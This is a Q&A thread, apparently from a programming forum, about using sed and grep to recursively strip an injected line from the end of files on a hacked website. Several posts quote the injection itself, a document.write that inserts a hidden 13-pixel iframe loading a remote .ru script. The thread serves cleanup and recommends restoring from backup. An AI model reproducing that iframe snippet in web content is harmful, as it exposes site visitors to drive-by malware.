# Sed find/delete for a string with multiple special characters recursively

Tags: sed, search, recursive

I'm having quite a bit of difficulty with a complex string. A friend's site was hacked and has since been locked down but I'm helping to clean up the mess leftover and what I need to do is the following:

Go recursively into every directory and if there is the following string at the end of the file, delete the string.

```
;document.write('<iframe src="http://efficienttrue.ru/upwherehandpainted.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');
```

As you can see the string contains single and double quotes, and multiple other special characters. I've tried putting an \ escape before every single special character but that doesn't seem to work. I tried this:

```
grep -rl efficienttrue.ru . | xargs sed -i "s/\;document\.write\(\'\<iframe\ src\=\"http\:\/\/efficienttrue\.ru\/upwherehandpainted\.cgi\?8\"\ scrolling\=\"auto\"\ frameborder\=\"no\"\ align\=\"center\"\ height\=\"13\"\ width\=\"13\"\>\<\/iframe\>\'\)\;/\/g"
```

but I get the following error:

```
sed: -e expression #1, char 201: unterminated `s' command
```

Comment: Restore from backup. It's the only way to really be sure.

Comment: It's good to do research into how the compromise occurred and what was done, but the only way to know you've actually reverted *all* unknown and unwanted changes is to restore from a safe external backup, as jordanm has said.

Answer (score 1):

It sounds like you're looking for something like this:

```
sed '${s/document\.write([^)]*);//}'
```

However I would really recommend against this sort of procedure for restoration from a compromise.

Comment: Trust me, if this was my site I would absolutely restore from backup but this isn't and, of course, they don't seem to have a backup at all.

Unfortunately, I think this just looks for the document.write line, right? 99% of the files which include this string are javascript and I don't want to remove that if it's necessary in another place on the same file, you know? Or am I misreading this?

Answer (score 0):

Yes restoring from backup is better. But as to sed:

```
sed -i '.bak' -e '$ {\!^;document\.write('\''<iframe src="http://efficienttrue\.ru/upwherehandpainted\.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'\'');$! d; }' FILENAME
```

I tested and it works properly, regardless of whether FILENAME has a trailing `\n`. However it does expect that the line to be deleted always is the last line (that's the point of the `$ { ... }`.

Comment: Is there something I'm missing in this one? Don't I need to run this through grep or find to cycle through the directories to find the files in the first place?

Comment: Yeah, I was just providing the `sed` part of it. You need to wrap that in something that supplies the FILENAMEs. Also note that as written, it saves `origfile` as `origfile.bak`, and writes the new version to `origfile`. If `origfile.bak` already exists, I think it gets overwritten. The manpage doesn't say. So you should check for that, or use `-i ''`, but the manpage points out some dangers with the latter. `-i` is not available for all sed implementations; without it, your wrapping script would have to handle renaming the output file itself.

Answer (score 0):

Yes, a backup is better. However, if you insist on replacement and want to avoid hustle with escapes, here is a generic solution.

1. Save the offending string into a file, and verify that no extra characters like UTF BOM prefix or line endings were appended

   ```
   xxd spec-chars.sample
   ```
2. Convert the string into an escaped byte sequence

   ```
   od -t x1 -v -A n spec-chars.sample | sed s/\ /\\\\x/g | tr -d \\n && echo
   ```
3. Create a couple test cases

   ```
   cat spec-chars-positive 
     asdfasdfsd
     ;document.write('<iframe src="http://efficienttrue.ru/upwherehandpainted.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');

   cat spec-chars-negative
     asdfasdfsd
     ;document.write('<iframe src="http://efficienttrue.ru/upwherehandpainted.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');
     qwer
   ```
4. Verify that the code works as expected

   ```
   grep -l efficienttrue spec-chars-* | xargs sed \$s/`od -t x1 -v -A n spec-chars.sample | sed s/\ /\\\\x/g | tr -d \\n`//
   ```
5. Perform an actual replacement

   ```
   grep -rl efficienttrue.ru . | xargs sed -ibak --follow-symlinks \$s/`od -t x1 -v -A n spec-chars.sample | sed s/\ /\\\\x/g | tr -d \\n`//
   ```